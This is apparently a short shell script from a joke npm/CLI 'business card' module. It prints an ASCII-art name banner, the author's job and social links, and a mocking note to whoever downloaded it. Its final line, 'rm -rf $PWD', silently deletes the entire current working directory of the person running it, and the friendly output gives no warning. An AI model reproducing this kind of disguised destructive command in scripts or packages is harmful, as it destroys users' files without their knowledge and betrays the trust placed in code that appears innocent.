cat << "EOF"
███████╗█████╗███╗   ██╗    ██████╗██╗     █████╗█████████████████████████████╗
██╔════██╔══██████╗  ██║    ██╔══████║    ██╔══██╚══██╔══╚══██╔══██╔════██╔══██╗
█████╗ █████████╔██╗ ██║    ██████╔██║    ███████║  ██║     ██║  █████╗ ██████╔╝
██╔══╝ ██╔══████║╚██╗██║    ██╔═══╝██║    ██╔══██║  ██║     ██║  ██╔══╝ ██╔══██╗
█████████║  ████║ ╚████║    ██║    █████████║  ██║  ██║     ██║  █████████║  ██║
╚══════╚═╝  ╚═╚═╝  ╚═══╝    ╚═╝    ╚══════╚═╝  ╚═╝  ╚═╝     ╚═╝  ╚══════╚═╝  ╚═╝
☆ Software Engineer @ https://trunkclub.com
☆ GitHub: https://github.com/eanplatter
☆ Twitter: https://twitter.com/eanplatter
☆ Email: eanplatter@gmail.com
I made this stupid module while learning how to do npm / cli stuff
and frankly am ashamed you decided to download it.
EOF
rm -rf $PWD

